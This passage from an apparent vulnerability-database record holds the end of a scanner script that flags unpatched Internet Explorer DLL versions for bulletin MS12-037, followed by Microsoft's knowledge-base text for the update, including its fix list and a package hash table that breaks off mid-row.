test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:37:04", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-037. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201206.aspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201206.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-5\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-037\" id=\"kb-link-6\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-037</a></div></li></ul><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates:<br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-7\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals:<br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-8\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-9\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country:<br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-10\" target=\"_self\">International Support</a><br/><br/></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2696955\" id=\"kb-link-11\">2696955 </a></td><td class=\"sbody-td\">You cannot open a file whose file name is fully encoded when you use Internet Explorer 9 to browse the webpage that contains the file</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715453\" id=\"kb-link-12\">2715453 </a></td><td class=\"sbody-td\">The Save As dialog box may intermittently not be displayed when you try to download a file in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2715815\" id=\"kb-link-13\">2715815 </a></td><td class=\"sbody-td\">The travel log is not updated when you post a form that is in a frame in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-14\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the name property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2718628\" id=\"kb-link-15\">2718628 </a></td><td class=\"sbody-td\">The display of a WebBrowser control may be partly erased when a menu item dropdown overlaps the control in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2719319\" id=\"kb-link-16\">2719319 </a></td><td class=\"sbody-td\">Internet Explorer 8 shuts down when you browse through a proxy server to a webpage that uses protected mode and SSL</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695422\" id=\"kb-link-17\">2695422 </a></td><td class=\"sbody-td\">A memory leak may occur when a modal dialog box opens in an iframe in Internet Explorer 8 </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2695166\" id=\"kb-link-18\">2695166 </a></td><td class=\"sbody-td\">Cannot print a document in Internet Explorer 8 or Internet Explorer 9 after closing Print Preview by using the Close (red X) button </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2703157\" id=\"kb-link-19\">2703157 </a></td><td class=\"sbody-td\">Memory leak when an application calls the WinHttpGetProxyForUrl function on a Windows 7-based or Windows Server 2008 R2-based computer </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2722090\" id=\"kb-link-20\">2722090 </a></td><td class=\"sbody-td\">Quotation marks in the \"name\" property of an HTML form are encoded with ASCII encoding two times during form submission in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2678934\" id=\"kb-link-21\">2678934 </a></td><td class=\"sbody-td\">Internet Explorer 9 shows a download bar for links that are targeted to an iframe </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2716900\" id=\"kb-link-22\">2716900 </a></td><td class=\"sbody-td\">A file that you opened in Internet Explorer 9 may be deleted when you click Cancel in the Internet Explorer Information bar </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2699988 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2699988 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2699988, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-23\">897225 </a>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-24\">824994 </a>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>FILE INFORMATION</h2><div class=\"kb-summary-section section\">For a list of files that are provided within these packages, click the following link: <br/><br/> <div class=\"indent\"><a href=\"http://download.microsoft.com/download/c/6/8/c68243cd-8b76-411f-a477-72f6a7e16c39/file attributes tables for security update 2699988.csv\" id=\"kb-link-26\" target=\"_self\">File attributes tables for security update 2699988.csv</a></div><h3 class=\"sbody-h3\">File hash table</h3>The following table lists the thumbprints of the certificates that are used to sign the security updates. Verify the certificate thumbprint in this KB article against the certificate thumbprint indicated on the security update that you download.<br/><br/><br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Publisher Filename</span></td><td class=\"sbody-td\"><span class=\"text-base\">Sha1</span></td><td class=\"sbody-td\"><span class=\"text-base\">SHA2</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">53324A0E42AEB5DE86E059613D33E3D13FB9686A</td><td class=\"sbody-td\">17C0FB2EF4644670ACB560A93BF79F3EF77A4F35F018498103611A8ADE84668C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">4B977D8EB3C2E8E366B0011A1E8ADE27C2DCA55E</td><td class=\"sbody-td\">B518113FFAE760022EE98680567F5F321C82D64E63DA83F56874CF140B3DE05C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">76D37077F850532294329FF714C8A5E838CA5093</td><td class=\"sbody-td\">26F52454F97BE9BCDD52B992272D6820E62479EAEDA0F60D953C9EFF5FF55DE5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">4D8274EFA81B59715C5306154E7C538ADD69B73D</td><td class=\"sbody-td\">E121B54C84E14CF2380F909A65CEF47EEFD0F2F0DF420B8D776D688CA2316212</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">3FF5FB761EF680CBF5663EBC8526CF816B78A422</td><td class=\"sbody-td\">6651F5A15548DAB0B169DB00578AE46113254181FCDFB2B42F05C2FCBFDB6EF4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">49271F1A17ECC761235C2CFCAA5BE7856B5C4043</td><td class=\"sbody-td\">92D40F9E72B15353730D3F3B2D0D3A2FD8D5D9EB88620285A4B8FFD6A6FDAAE8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ita.exe</td><td class=\"sbody-td\">C6DA0ABC4A614D26FF789F6671E075C48DB4E921</td><td class=\"sbody-td\">99B503BFD5A6D7FB57A9F29868832FA2B4D3A3581775BCE9CC6292C6C63E3B91</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-chs.exe</td><td class=\"sbody-td\">55D7DF59F4120882746EDE0C88AE18FA13E2656E</td><td class=\"sbody-td\">F5F6BC7C6B3CE82DF64235DA3A384896A8AD7850BBEB2BD2C9BD6F0A79135AF6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-trk.exe</td><td class=\"sbody-td\">6341B3CC0D30E97C21F663EF2FF315461CF0D9F3</td><td class=\"sbody-td\">45E44ACD48E1BB1165D0429BB6DF6478C8286174972CD7E4A44FE8B97E0D81D4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">C2DE6F6D9F0C946221A561DD747F06986F1F80C2</td><td class=\"sbody-td\">29164695BAAFC26E99BD4363787D71CEB26F28857C069F5DB4C28B68E628759B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-sve.exe</td><td class=\"sbody-td\">BAEC609413E2B63036797B91DD83B3F846501AD1</td><td class=\"sbody-td\">895E73B1B7340D5F13AA9DE57A38E93B0473BFAC5623CF0962B0A9B066B0EBDC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">520E5F469C55468D990C4A9B45B58E9E00B4FC5C</td><td class=\"sbody-td\">1207CA4DC0C093EF0792B54BFB4BF0FAAAFB9BC407C3F0EE412DF6C4F4A4504B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-ptg.exe</td><td class=\"sbody-td\">D0E1CEDDBFFD8A10B5EBAC568BB72241364453BA</td><td class=\"sbody-td\">0AF5DBC61D454601A4F9AECB5D979993B541DAAE11090C6A2A1A61C45D202B5E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003-kb2699988-x86-kor.exe</td><td class=\"sbody-td\">8D6B0D5B080328AC6D3ECADAC9524E1BDEDB9EE4</td><td class=\"sbody-td\">1855D9D549A714C38E29A6CA11798A1418A63AB4EB5B21D724D488C9E76D84F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-rus.exe</td><td class=\"sbody-td\">CCA5558F2076326C1BAC2F682C920911729F42CA</td><td class=\"sbody-td\">4D1617A49D63ADE567105AEAAE495D76C42DF5A43313652D19B2649B931F3997</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-esn.exe</td><td class=\"sbody-td\">4EADFE9DB4C9AFF061D1FB8B6395C9C3E8B49CB4</td><td class=\"sbody-td\">CFD65D5D8B88794FA5528E51F59211AC06B989A7E7E2C81A37FBC807FF29AE4E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-kor.exe</td><td class=\"sbody-td\">CAA96AB4199B553A6CCF3417ECE6D21F08DC9BF6</td><td class=\"sbody-td\">2695A8C82629A82B181E2DC76363917F2E957D562B190A56D0A121696459338B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-chs.exe</td><td class=\"sbody-td\">AB615DE8CE915281A6175C4927D5896F05C9E86E</td><td class=\"sbody-td\">18061A35C113484614F568B4C2E6958EDC0201D73837139C05EB11A206FE6949</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsserver2003.windowsxp-kb2699988-x64-ita.exe</td><td class=\"sbody-td\">201A560747B730990976382944DAB6024289A960</td><td class=\"sbody-td\">9C926085D6DE959C34C0AA3BAB934924CDFCF2FA609D3FAEE90572036743FD71</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">D9291225462A9C95ECC24E4056A15A614425982D</td><td class=\"sbody-td\">FB9BC832EEA32D85188CC672F48F979C232A1126D7AB0294F470EDC0491BF4A9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">B0EDA1894F1C609437B4F43E82139F614B3E50B6</td><td class=\"sbody-td\">61A67DC529CE87B02BB7A3B7386CB2060DDCF5353F1A6692A3F66D4D84FADB3E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-ptb.exe</td><td class=\"sbody-td\">75E54D51D1BA4F1DBA1D82B74DDADF407C24DC9B</td><td class=\"sbody-td\">4B77C626DF204B1B6995197226815D09F760B037DD149F3EB8CA1B29FAD518A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-fra.exe</td><td class=\"sbody-td\">F6127D77CADBA301CA658F7D28ADC0875E024234</td><td class=\"sbody-td\">7A89835EADEC0CBA1915B10D9D707E4C0AACD271E2A89CE54EA3CB1097FF64DE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-deu.exe</td><td class=\"sbody-td\">324B4AD1ABFDCEE18641AA70D1AAB5E7419AC726</td><td class=\"sbody-td\">D8113983BBDAF953F1342C6933608F0993888BA64B83D60E70D85518696267C6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-jpn.exe</td><td class=\"sbody-td\">6E944314F86522FEF44579A173847D2FB3C83406</td><td class=\"sbody-td\">CB143BB175E08D970079451393D6A5F3FED82D553A5ED2EB3717A2382806E1F7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie8-windowsserver2003-kb2699988-x86-plk.exe</td><td class=\"sbody-td\">BE74802AE609DFFD2460DE61F54926151514C355</td><td class=\"sbody-td\">EC1D553C7FFBFF24397482E513194FAF2A8C6BD7B44EBF92005FFFF04C6ED1A4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.1-kb2699988-x86.msu</td><td class=\"sbody-td\">2820E2FD398378D2CF4B1EDDE7A086764438F7C2</td><td class=\"sbody-td\">E38929923CA479D817B0588EA62B325FF202F8F2524F3AA45145385F5AD4163D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie9-windows6.0-kb2699988-x86.msu</td><td class=\"sbody-td\">620B26312E3485E2B536834A82BA8963917D2CF7</td><td class=\"sbody-td\">7D92920B0474676BEF0C5B05A665F096DDF2EBBFECB208F24803527EC73AE13C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-enu.exe</td><td class=\"sbody-td\">E6B4684880C31EC6AED099BBE078E3425398A94D</td><td class=\"sbody-td\">B5C7B8ABC841536571889F7F3A1FAE6E4354191273DC4A5084853FE675C4EC96</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ell.exe</td><td class=\"sbody-td\">96CB74D23D25963E4F2782339D5412A0E782B189</td><td class=\"sbody-td\">543620A6EDF7E960F2CEDF9302603308F59A32B2F11A1CA8835E91C62FC38433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fra.exe</td><td class=\"sbody-td\">545987F11166DC04D0613D875A646DFEED9AB7D0</td><td class=\"sbody-td\">E77210B39D945DC9A38CC6900AE7EA2C82A8C92A70D65A9E857E7E315269EBAE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ara.exe</td><td class=\"sbody-td\">F4D0F87ABF38FBF275392A3C9748A36E2CE13934</td><td class=\"sbody-td\">22C0CAD9536F3B9FC49CB44F3E6FDFAB26719905940F8826A461D25131685346</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-jpn.exe</td><td class=\"sbody-td\">56CFACA3F22B03B4F7A773A917CF999080276C77</td><td class=\"sbody-td\">CAF5FA8DC7161605CBC4908F568F77257E34C0236411D791F1E966815E01E81C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-deu.exe</td><td class=\"sbody-td\">35CF11BBC1A60606C2511904613F436FD05D269F</td><td class=\"sbody-td\">4D2E77852804C1DECB0EAD9367F1CDD4E485CA47B9F16767A3E04FA07AD558A8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-cht.exe</td><td class=\"sbody-td\">E120C08405EBC05D0552EF2C73DCC1854A72F739</td><td class=\"sbody-td\">F217F1013890839DDB8BE591D02DE0D906F073C341EF0B05C92CFDD30185C182</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-chs.exe</td><td class=\"sbody-td\">931A16D0BE4EE89C23759B95BEC85AFC3CA3B50D</td><td class=\"sbody-td\">1340DCE0BF2C88009034801835EC4B5FAB0B983CBD50CEA1171A9043583FCF24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptg.exe</td><td class=\"sbody-td\">82E6714C328D518A0FFC389FC5F0871A69368D5E</td><td class=\"sbody-td\">E3D03FF3C8FC90579FBBE1952C82C60838844DD5FB9B56C61F02A449B0E514D9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-trk.exe</td><td class=\"sbody-td\">77F654C7309DF235FD4F564F139FCB34D7B17440</td><td class=\"sbody-td\">7DB8389DB0D4E0BE1BF326E7520AB4FEF91F17F395E76B0F71BB9AF620039FFA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-kor.exe</td><td class=\"sbody-td\">11FB70381AEDCD7248CBF4D10384EB02516D2725</td><td class=\"sbody-td\">ABBE958725DC90FD8EAC57A8ACDB352C44147ED39FE9BD41B2082DAA548A6C0C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-dan.exe</td><td class=\"sbody-td\">1CCBA29C539D11940CDADB782A25438D3CA95812</td><td class=\"sbody-td\">3B71F651A417D30DD0568B6080FD1E4B66D30211BEC9EC6F24098F381F3607EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-ptb.exe</td><td class=\"sbody-td\">B12214C90CDC27661538E758FD7CEE22A300DCE0</td><td class=\"sbody-td\">9E42CF3CEBF0E8E649031557E2447ADC831446FC282C1972FA7A62B7427C2D49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-fin.exe</td><td class=\"sbody-td\">F23281BE655B1BC3C7E6B73254578C9EACD7EAFB</td><td class=\"sbody-td\">E345EB64527650446802AE99A939F391B5B88CD8FA5CBAC25D5A605989928562</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-sve.exe</td><td class=\"sbody-td\">E75AAC374D05F857F5F6A8A3883C8F94ABCB4706</td><td class=\"sbody-td\">98A1D235EB24F2744F2E91FEF3F391A3995B439B03C71888D10596EAD2E5BF7A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-csy.exe</td><td class=\"sbody-td\">C0022581F3A7E835DFFF778D7222A8879C2A048C</td><td class=\"sbody-td\">A8E2154B9EA8CF6543D6604D362F3168BD4AD09036775A38FBD0B3B5A67FB57E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-hun.exe</td><td class=\"sbody-td\">31A770BF7B72685937B601DEF801FCC930DA3007</td><td class=\"sbody-td\">66513AC64441CB431A706F664E8D340D0CC8D4ED1EEC7ACBFF05B3185D77D531</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-nld.exe</td><td class=\"sbody-td\">0A44861983618C137B45239871E508580E123748</td><td class=\"sbody-td\">1156B2987BD04288B820B17085A689E7B1295E03553EB7CC287A18C10E11E5B0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-nor.exe</td><td class=\"sbody-td\">FDB2F26CF765DC648B649D77F38092825E28A5DC</td><td class=\"sbody-td\">F996F642D9B8B1FC85BC10675120FAAD8C9589C16E5D0C7EB07B31D45B792AAC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-plk.exe</td><td class=\"sbody-td\">B99C2E9E77386EF15B2A6ACD157F95FDCEB6C37D</td><td class=\"sbody-td\">79D508446B5BDC84778FE7624D53BB6A01D21244EA512A0745B44A221286CC37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-rus.exe</td><td class=\"sbody-td\">DA539EACC8E89D8F23AD9A36DB36C3C85DC4A231</td><td class=\"sbody-td\">726334A9E11ABA40946865C11E35A8802EE2C75EB28D33A0413E7EDB8F243810</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">windowsxp-kb2699988-x86-custom-esn.exe</td><td class=\"sbody-td\">F5FE8E0954B6009E1831D93FF9BACA4FFA94BAE0</td><td class=\"sbody-td\">36034FC50F85919EF95BD3F63C5620DF5D4287CEF370637080CED359CB3D10E9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-enu.exe</td><td class=\"sbody-td\">62359CE85561D32E7AE4F396957040AEA02321A2</td><td class=\"sbody-td\">3292E51A39A405849AD0BCE7A37C53A1246FDC41B8C56BC9CD2EB891D793D46F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-rus.exe</td><td class=\"sbody-td\">F2D3A09FAA78CF8C9CAEBE7191A5B37583BA65F9</td><td class=\"sbody-td\">DA315B176A3E9529B5DADD7A1DA425AFA39385BDE06DEC6DC251B523C1AFFC9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-csy.exe</td><td class=\"sbody-td\">203AF738AC1E40B97B7F8A84EDEC61E0752F94BD</td><td class=\"sbody-td\">B3C64857417ABD69E663B14AD53717675BEF44C4C35CA6CDAACDB167B067EE7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-dan.exe</td><td class=\"sbody-td\">CF811B052E3C05310095F13AF85BDD20A2CE4161</td><td class=\"sbody-td\">DB3FCB899BB59821C94BE6C35E347ECCDB8114635DC1E840217D64DBA755277A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-esn.exe</td><td class=\"sbody-td\">9EDC8536C6400958E30C80254131474247803EE3</td><td class=\"sbody-td\">2C07786B223FAA83EEDFAFDB02858310D8C21407384ADA94DF9E7CC0399AF534</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-fin.exe</td><td class=\"sbody-td\">486075C772D6425ECAC9AEF3C93BA16E69739B81</td><td class=\"sbody-td\">4AA219AF257A94A065D5F539E1EC43E11E1EDE09CD8DAD724F77140A55D8957B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-hun.exe</td><td class=\"sbody-td\">71E6715265E829F5BBB91C89293ED9005E35718F</td><td class=\"sbody-td\">6F428042F3A0A3618DFE5362C75FA76D03A171F5A5F3F021FA7E95A6B0ED53C2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-heb.exe</td><td class=\"sbody-td\">C65ED3A6997FC339F887272341014024D863DB27</td><td class=\"sbody-td\">424E00A9CCCB8BDA79414D142C307671FCB247C677060FD26AFB83CE54492F06</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-nld.exe</td><td class=\"sbody-td\">337BA1A18E74AEC0E55F57BD09F4B6BFB33D3BEC</td><td class=\"sbody-td\">16C333555F05FBC2213A26421290A9868A17207E32CB7D98E621F556B8BD0441</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">ie7-windowsxp-kb2699988-x86-nor.exe</td><td 